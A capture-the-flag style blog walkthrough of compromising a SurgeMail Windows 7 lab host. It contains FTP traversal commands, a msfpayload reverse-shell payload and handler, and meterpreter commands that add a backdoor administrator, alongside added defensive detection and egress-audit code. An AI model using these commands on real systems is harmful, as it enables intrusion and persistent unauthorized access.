Monday, May 10, 2010

Offensive Security Part 2 -- KilltheN00b Walk Through

How Strong is Your FU hacker challenge Part 2

Target 2: KilltheN00b

After some chips, salsa and a supersized burrito from el habinaro I was down for another challenge. I logged into the offsec labs and reviewed some of the documentation on the contest page, which stated there were 2 targets.

Killthen00b
Ghost

After a quick portscan I chose to attack killthen00b purely based on the number of open ports on the system. Ghost exposed HTTP only. KilltheN00b had various ports open, including FTP, HTTP and various mail ports.

Scan output:
21/tcp   open  ftp
|_ftp-anon: Anonymous FTP login allowed
25/tcp   open  smtp          Surgemail smtpd 3.8k4-4
80/tcp   open  http          Surgemail webmail (DNews based)
|_html-title: SurgeMail Welcome Page
106/tcp  open  pop3pw        Qualcomm poppassd (Maximum users connected)
110/tcp  open  pop3          SurgeMail pop3d 3.8k4-4
143/tcp  open  imap          SurgeMail imapd 3.8k4-4
366/tcp  open  smtp          Surgemail smtpd 3.8k4-4
465/tcp  open  tcpwrapped
587/tcp  open  smtp          Surgemail smtpd 3.8k4-4
993/tcp  open  tcpwrapped
995/tcp  open  tcpwrapped
3389/tcp open  ms-term-serv?
7025/tcp open  tcpwrapped
7443/tcp open  tcpwrapped



More ports = = more fun ??
More Targets = = more fun??
All Girls Just want to have fun?? Wait no that's a song LOL

Probably a wrong assumption, but it's a good theory to cling to when things get rough.


Initial FTP probing:
First thing I did was log into the FTP server with the credentials provided on the offsec page. After logging in there wasn't much to play with in any available directories, so I decided to try to hop out of the FTP environment.

I tried to hop out of the FTP directory structure via directory traversal with "cd ../../../../../"... Failed, so I then flipped the slashes to "cd ..\..\..\..\..\" and the response back indicated a fail. So I decided to directly call the root directory with "cd c:".

Score

Cd C: correctly hopped me into a directory with loads of files available. I also seemed to be able to browse to a directory with system32 files. My actual first thought was to replace the system32 program Magnify.exe with my evil payload so that at the Remote Desktop login the accessibility options would become a shell. But unfortunately I didn't have access to write to that directory, so I moved on. After browsing files for a while I decided this FTP session was a bust and logged out.
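Why the forward-slash attempt fails while the backslash and drive-letter attempts get out comes down to path canonicalisation: a jail check written with Unix assumptions only knows "/" as a separator and a leading "/" as absolute, while the Windows file API also treats "\" as a separator and resolves a bare "c:" against the process's per-drive current directory rather than the FTP user's directory. The model below is an added example for this write-up, not SurgeMail's code; the jail root, the process directory and every path in it are constructed assumptions. It runs the three cd arguments from the session through a Unix-style check and through a hardened resolver that canonicalises with the target OS's own rules before testing containment.

```python
"""Model of a Unix-style FTP jail check running on Windows.

Added example for this write-up, not SurgeMail's code. The jail root, the
process directory and every path below are constructed assumptions.
"""
import ntpath

# Constructed physical jail for the FTP user (hypothetical path).
JAIL_ROOT = r"C:\ftproot\n00b"

# A Windows process keeps one current directory per drive; for a service that
# is typically its install directory or C:\, never the FTP user's jail.
# Constructed value for the model.
PROCESS_CWD_PER_DRIVE = {"c:": r"C:\surgemail"}


def unix_style_check(arg: str) -> bool:
    """The vulnerable check: '/' is the only separator it knows, a leading '/'
    is the only absolute form it knows, and it rejects '..' components.
    To it, '..\\..\\..\\' is one harmless component and 'c:' looks like a file."""
    if arg.startswith("/"):
        return False
    return all(part != ".." for part in arg.split("/"))


def windows_resolve(physical_cwd: str, arg: str) -> str:
    """What the Windows file API does with an approved string: '\\' separates
    components, so '..\\' climbs, and a bare drive spec such as 'c:' is a
    drive-relative path resolved against the process's current directory on
    that drive, not against the FTP user's directory."""
    drive, rest = ntpath.splitdrive(arg)
    if drive and not rest:
        return PROCESS_CWD_PER_DRIVE.get(drive.lower(), drive + "\\")
    return ntpath.normpath(ntpath.join(physical_cwd, arg))


def inside_jail(physical: str) -> bool:
    """Case-insensitive containment test on the final physical path."""
    root = ntpath.normcase(JAIL_ROOT)
    path = ntpath.normcase(physical)
    return path == root or path.startswith(root + "\\")


def vulnerable_cwd(physical_cwd: str, arg: str) -> str:
    """Check the client's string with Unix rules, then let Windows resolve it."""
    if not unix_style_check(arg):
        raise PermissionError("550 Access denied")
    return windows_resolve(physical_cwd, arg)


def hardened_cwd(physical_cwd: str, arg: str) -> str:
    """Reject drive and UNC prefixes outright, canonicalise with the target
    OS's own rules first, and only then test containment in the jail."""
    if ntpath.splitdrive(arg)[0] or arg.startswith(("\\\\", "//")):
        raise PermissionError("550 Access denied")
    normalised = arg.replace("/", "\\")
    base = JAIL_ROOT if normalised.startswith("\\") else physical_cwd
    physical = ntpath.normpath(ntpath.join(base, normalised.lstrip("\\")))
    if not inside_jail(physical):
        raise PermissionError("550 Access denied")
    return physical


def demo() -> dict:
    """Run the three 'cd' arguments from the session through both resolvers."""
    cwd = ntpath.join(JAIL_ROOT, "MyDocuments")
    report = {}
    for arg in ("../../../../../", "..\\..\\..\\", "c:"):
        for name, fn in (("vulnerable", vulnerable_cwd), ("hardened", hardened_cwd)):
            try:
                physical = fn(cwd, arg)
                report[(name, arg)] = ("allowed", physical, inside_jail(physical))
            except PermissionError:
                report[(name, arg)] = ("blocked", None, True)
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The point of the hardened version is ordering: containment is tested on the path the operating system will actually open, after every separator and drive form the OS accepts has been normalised, rather than on the string the client typed.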

HTTP:
Next I decided to hit up the web page located on KilltheN00b. The webserver indicated an application by the name of "surgemail".

Also I noted the scripts directory on this site seemed to execute pages with an EXE extension. Very interesting...

I then checked the exploit databases and verified there was an exploit for the running version of SurgeMail that was valid for Windows 2000 and 2003.

Debugging:
Next I decided to check the Remote Desktop port, only to find out killthen00b was running a Win7 operating system and the exploit would need modification before it would work. This was a

TOTAL FAIL

I loaded up the debugger and started modifying the exploit, and after a bit of wrestling with the exploits on Exploit-DB realized that I was unable to control EIP. Either due to my lack of advanced-level exploitation skill or the differences in operating systems and their protection mechanisms, I only had control of certain parts of the stack but no EIP overwrite. To be precise, the exploit relies on a partial overwrite of EIP: the OS already supplies a zero byte as the first byte of the 4-byte EIP, and the overflow reuses that existing null to bypass filters on insertion (I like that), since sending our own null would stop execution of the program prematurely.

Before going further with this I realized this exploit was a post-authentication exploit and would need a user account. grrrr

More Web:
I browsed around the surgemail pages for a while trying attacks against authentication and authorization without much success, till I hit a /domainadmin management page. On this page I was able to guess a password of test/test, using Burp "comparer" to compare my responses, and noticed one of the outputs said "Account Details". I then verified that I could log into the server by logging into another port used for changing passwords, "poppassd" on port 106. The found login worked.

Woot, I could now use that exploit if I could get the exploit to work.. however this was still a fail after messing with it for a few hours.

Back to FTP:
After noticing the EXE files with possible execution on the webpage, I decided to hit the FTP session back up and see if I could get to the scripts directory. After messing around for a while I realized that "cd ..\..\" actually was working, and after a few iterations it got me to the root directory. I browsed to the surgemail/scripts directory:

ftp> cd ..\..\..\
250 Directory changed to "/MyDocuments/............./......../......".
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for listing
dr-xrwx--- 1 admin users              0 May 03 22:58 $Recycle.Bin
dr-xrwx--- 1 admin users              0 Jul 13 2009 Documents and Settings
dr-xrwx--- 1 admin users              0 Jul 13 2009 PerfLogs
dr-xrwx--- 1 admin users              0 May 03 19:20 Program Files
dr-xrwx--- 1 admin users              0 May 03 19:21 ProgramData
dr-xrwx--- 1 admin users              0 May 03 22:51 Python26
dr-xrwx--- 1 admin users              0 Apr 30 01:21 Recovery
dr-xrwx--- 1 admin users              0 May 07 23:48 surgemail
dr-xrwx--- 1 admin users              0 May 03 22:38 System Volume Information
dr-xrwx--- 1 admin users              0 May 07 23:48 Users
dr-xrwx--- 1 admin users              0 May 03 21:28 Windows
-r--rr---- 1 admin users             24 Jun 10 2009 autoexec.bat
-r--rr---- 1 admin users             10 Jun 10 2009 config.sys
-r--rr---- 1 admin users     2147016704 May 07 23:44 pagefile.sys
-r--rr---- 1 admin users       12645888 May 03 05:53 surgemail_installer.exe
ftp> cd surgemail
250 Directory changed to "/MyDocuments/............./......../....../surgemail".
ftp> cd scripts
250 Directory changed to "/MyDocuments/............./......../....../surgemail/scripts".

I then tried uploading a test file and it worked.... at this point I got pretty excited and went into exploitation mode.


Meterpreter Evil.exe:
Now I needed an evil EXE file for the webserver to serve up and run for me on the KilltheN00b host. So I popped open Metasploit..

Create a reverse_tcp meterpreter shell.
root@ficti0n:~# cd /pentest/exploits/framework3
root@ficti0n:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.142 LPORT=4444 X > evil.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=192.168.6.142,LPORT=4444

Now we have our test shell to try, which I then uploaded to the FTP server in the surgemail/scripts directory; this directory also contained other EXE files such as webmail.exe.


Back to the web part 2: the evil upload

Back on the web it was time to browse to the scripts directory and cross my fingers and toes, along with yelling at my friends to cross their fingers and toes too!!! Very important that all the bases are covered in information security..


Offensive Security in depth!!!  or something like that.. (Wishful thinking)

So I started a multi/handler in Metasploit first, just in case the reverse shell worked.
msf > use multi/handler
msf exploit(handler) > set LHOST 192.168.6.142
LHOST => 192.168.6.142
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.142:4444
[*] Starting the payload handler...

I then proceeded to browse to the directory with all body parts crossed..... hoping for a connect-back.

SCORE!!!!!

My connection status in Metasploit then indicated I had an open session. :)

Post Exploitation:
With a shiny shell in hand I first dumped the hashes via meterpreter hashdump, but I noticed from the sequence of characters that the LM hashes were blank. So I decided to just create my own user using the following scenario.

Get higher privileges:
meterpreter > getsystem
...got system (via technique 1).


Add a new domain admin:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > add_user ficti0n
[*] Attempting to add user ficti0n to host 127.0.0.1
[+] Successfully added user
meterpreter > add_localgroup_user Administrators ficti0n
[*] Attempting to add user ficti0n to localgroup Administrators on host 127.0.0.1
[+] Successfully added user to local group

But I like GUIs, so let's get Remote Desktop. I noted in an earlier attempt to log into Windows with my FTP credentials that I needed to be part of the Remote Desktop Users group.. so let's be part of the cool kids group, shall we??

Get a Remote Desktop Gui:
meterpreter > add_localgroup_user "Remote Desktop Users" ficti0n
[*] Attempting to add user ficti0n to localgroup Remote Desktop Users on host 127.0.0.1
[+] Successfully added user to local group

SCORE! I can now log in with domain admin on a pretty GUI interface provided by Microsoft.. Thanks Microsoft :) and thanks Metasploit.
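From the blue-team side, the getsystem / add_user / add_localgroup_user sequence above leaves a very recognisable trail in the Windows Security log: a new local account (event 4720) followed within seconds by additions to Administrators and to Remote Desktop Users (event 4732, where the member is the account and TargetUserName is the group), all performed by the local SYSTEM identity rather than an administrator at a console. The rule below is an added example and not part of the original post; the events are constructed and flattened to the handful of fields the correlation needs, the timestamps and the "helpdesk"/"jsmith" baseline are assumptions, and only the account name ficti0n comes from the session above.

```python
"""Correlate local account creation with sensitive group changes.

Added example, not from the original post. Windows records a new local account
as Security event 4720 and a member added to a security-enabled local group as
4732 (the member is the account, TargetUserName is the group). The events below
are constructed and flattened to the few fields the rule needs.
"""
from datetime import datetime, timedelta

SENSITIVE_GROUPS = {"administrators", "remote desktop users"}
WINDOW = timedelta(minutes=10)

# Constructed sample events (hypothetical timestamps; ficti0n is the account
# name from the write-up, helpdesk/jsmith are a made-up benign baseline).
SAMPLE_EVENTS = [
    {"time": "2010-05-10 02:20:11", "id": 4720, "subject": "SYSTEM",
     "account": "ficti0n", "group": None},
    {"time": "2010-05-10 02:20:13", "id": 4732, "subject": "SYSTEM",
     "account": "ficti0n", "group": "Administrators"},
    {"time": "2010-05-10 02:21:40", "id": 4732, "subject": "SYSTEM",
     "account": "ficti0n", "group": "Remote Desktop Users"},
    # Benign baseline: helpdesk creates an ordinary user the next morning.
    {"time": "2010-05-10 09:02:05", "id": 4720, "subject": "helpdesk",
     "account": "jsmith", "group": None},
    {"time": "2010-05-10 09:02:30", "id": 4732, "subject": "helpdesk",
     "account": "jsmith", "group": "Users"},
]


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def correlate(events, window: timedelta = WINDOW) -> list:
    """Return one finding per sensitive-group addition. Severity is 'high' when
    the account was created within `window` beforehand (create-then-elevate)
    or when the change was made as SYSTEM rather than by an admin account,
    which is what getsystem followed by add_user looks like in the log."""
    created = {}   # lower-cased account -> (creation time, subject)
    findings = []
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        if ev["id"] == 4720:
            created[ev["account"].lower()] = (_ts(ev["time"]), ev["subject"])
        elif ev["id"] == 4732 and (ev["group"] or "").lower() in SENSITIVE_GROUPS:
            acct = ev["account"].lower()
            finding = {"time": ev["time"], "account": ev["account"],
                       "group": ev["group"], "subject": ev["subject"],
                       "severity": "medium", "created_by": None}
            if acct in created and _ts(ev["time"]) - created[acct][0] <= window:
                finding["severity"] = "high"
                finding["created_by"] = created[acct][1]
            if ev["subject"].upper() == "SYSTEM":
                finding["severity"] = "high"
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["account"], "->", f["group"], "by", f["subject"])
```

On a real host the same fields come from the 4720/4732 event XML; the rule is deliberately indifferent to how the account was added (incognito, net user, or the GUI) because the log pattern is the same.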

After logging into the Windows 7 machine I quickly found my proofs.txt and added it to the online scoreboard to raise me up to 50pts total. Job well done... Thanks to steponequit and carnalownage and sygog for collaborating on attack possibilities; sometimes multiple minds work better, and even if it's not the solution, possibilities for the future arise.



Lessons Learned:
-Don't listen to other people's chatter and take it as truth. While I was in IRC everyone was talking about compiling code and getting payloads correct..
-I knew better; I knew there was an easier way and only wasted a limited amount of time on exploit writing. I am sure there is a way to port that exploit, but messing around all day isn't going to get me past the challenge.
-Again, go with your initial observations of the application. My observation that the webpage was executing EXE files ultimately got me into the application, even though I veered off the path for a while listening to people in the IRC chat about payloads.
-Also, again, always try things twice and CONFIRM.... Initially I thought I didn't have the traversal; it turns out I did, 3 hours before I used it!

Remediation:
-Check the ACLs and the jails on your FTP servers and make sure they are not traversable.
-Review your applications for any known exploitable 3rd party software and update it.
-Do antivirus checking on file uploads to stop payloads from being uploaded and executed.
-Do egress filtering to stop unnecessary ports from calling back to listeners on attackers' machines.
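The last item is the one that would have turned the whole chain into a dud: evil.exe ran, but the session only existed because the box was free to open an outbound TCP connection to 192.168.6.142:4444. The script below is an added example, not part of the original post. It parses the Windows Firewall log in its W3C layout (pfirewall.log, where the "#Fields:" header names the columns) and reports outbound connections a mail/web server has no business making. The log lines are constructed, the server address 192.168.6.10 is a placeholder, and the allow-list is an assumed policy; only the 192.168.6.142 listener comes from the session above.

```python
"""Egress audit over Windows Firewall log lines.

Added example, not part of the original post. Parses lines in the pfirewall.log
W3C layout (the '#Fields:' header names the columns) and flags outbound
connections that a mail/web server has no business making. The log lines are
constructed; the server address and the allow-list are assumptions.
"""
from dataclasses import dataclass

# Assumed egress policy for a mail/web server: SMTP relay, DNS, HTTP(S) for
# updates. Any other outbound connection is reported.
EGRESS_ALLOW = {("TCP", 25), ("TCP", 53), ("UDP", 53), ("TCP", 80), ("TCP", 443)}

# Constructed sample log. 192.168.6.10 is a placeholder for the server;
# 192.168.6.142 is the listener from the write-up.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2010-05-10 02:13:55 ALLOW TCP 192.168.6.142 192.168.6.10 51320 80 0 - 0 0 0 - - - RECEIVE
2010-05-10 02:13:56 ALLOW TCP 192.168.6.10 192.168.6.142 49211 4444 0 - 0 0 0 - - - SEND
2010-05-10 02:14:01 ALLOW UDP 192.168.6.10 192.168.6.1 53402 53 0 - - - - - - - SEND
2010-05-10 02:14:05 ALLOW TCP 192.168.6.10 10.0.0.20 49212 25 0 - 0 0 0 - - - SEND
2010-05-10 02:14:09 DROP TCP 192.168.6.10 192.168.6.142 49213 4445 0 - 0 0 0 - - - SEND
"""


@dataclass(frozen=True)
class Event:
    time: str
    action: str
    protocol: str
    src_ip: str
    dst_ip: str
    dst_port: int
    direction: str   # SEND (outbound) or RECEIVE (inbound)


def parse_pfirewall(text: str) -> list:
    """Parse W3C-style firewall log text using its own '#Fields:' header."""
    fields = None
    events = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        events.append(Event(
            time=f"{rec['date']} {rec['time']}",
            action=rec["action"],
            protocol=rec["protocol"],
            src_ip=rec["src-ip"],
            dst_ip=rec["dst-ip"],
            dst_port=int(rec["dst-port"]),
            direction=rec["path"],
        ))
    return events


def audit_egress(events, allow=EGRESS_ALLOW) -> list:
    """Outbound connections the firewall allowed but the policy does not."""
    return [e for e in events
            if e.direction == "SEND" and e.action == "ALLOW"
            and (e.protocol, e.dst_port) not in allow]


def blocked_egress(events) -> list:
    """Outbound attempts the firewall already dropped: evidence the filter is
    doing its job, and still worth alerting on when the source is a server."""
    return [e for e in events if e.direction == "SEND" and e.action == "DROP"]


if __name__ == "__main__":
    evs = parse_pfirewall(SAMPLE_LOG)
    for e in audit_egress(evs):
        print(f"ALERT {e.time} {e.src_ip} -> {e.dst_ip}:{e.dst_port}/{e.protocol} allowed outbound")
    for e in blocked_egress(evs):
        print(f"INFO  {e.time} {e.src_ip} -> {e.dst_ip}:{e.dst_port}/{e.protocol} dropped outbound")
```

The same (protocol, port) allow-list is what an outbound rule set on the host firewall or the network edge should enforce; running the audit over the log first shows what a server actually talks to before the default-deny rule goes in.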

Get a HUGE security budget and hire me to run all your penetration tests for twice your average cost!!! Preferably from the beach, externally :) Don't forget to add Red Bull and Sour Patch Kids to the budget!!! They are ESSENTIAL to my findings.


Closing notes:
I then went to the gym to wake up my forgotten muscles from sitting around all day and night... This was over 24 hours into this challenge; I cheated and took a little (LONG) nap somewhere in there too.. I know, I know.. sleeping on the job, but hey, there was a pillow close by and I ran out of Red Bull..


Up next:  Part 3
Dropping shells on Ghost and watching him laugh as he ultimately owns me!!!!


